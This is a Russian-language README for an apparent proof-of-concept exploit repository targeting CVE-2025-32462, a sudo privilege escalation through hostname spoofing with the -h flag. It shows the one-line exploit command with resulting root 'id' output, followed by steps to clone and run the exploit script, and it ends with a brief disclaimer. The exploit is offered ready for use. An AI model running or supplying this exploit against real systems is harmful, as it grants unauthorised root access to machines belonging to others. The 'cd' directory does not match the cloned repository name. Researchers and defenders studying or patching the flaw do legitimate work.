
PoC-эксплойт для CVE-2025-32462, повышения привилегий sudo через подмену имени хоста. Демонстрирует обход ограничений на основе имени хоста для получения root-доступа на уязвимых системах (< 1.9.17).
Подмена имени хоста и повышение привилегий (CVE-2025-32462)
"Ты принимаешь синюю таблетку... история заканчивается. Ты принимаешь красную таблетку... ты получаешь root."
Этот эксплойт демонстрирует уязвимость повышения привилегий в sudo (CVE-2025-32462), где ограничения на основе имени хоста можно обойти с помощью флага -h. PoC создает среду ограниченного пользователя, затем выходит из нее, подменяя разрешенное имя хоста, чтобы получить root-доступ.
[user@matrix-node]$ sudo -h zion-core bash # Подмена разрешенного имени хоста
[root@matrix-node]# id # Получили root на неправильном хосте!
uid=0(root) gid=0(root) groups=0(root)
Клонировать репозиторий:
git clone https://github.com/cybersentinelx1/CVE-2025-32462-Exploit.git
cd matrix-sudo-escape
Сделать исполняемым и запустить:
chmod +x matrix-sudo-escape.sh
./matrix-sudo-escape.sh
Следуйте интерактивным подсказкам для демонстрации:
Только для образовательных/исследовательских целей. Используйте только на системах, которыми вы владеете или имеете разрешение на тестирование.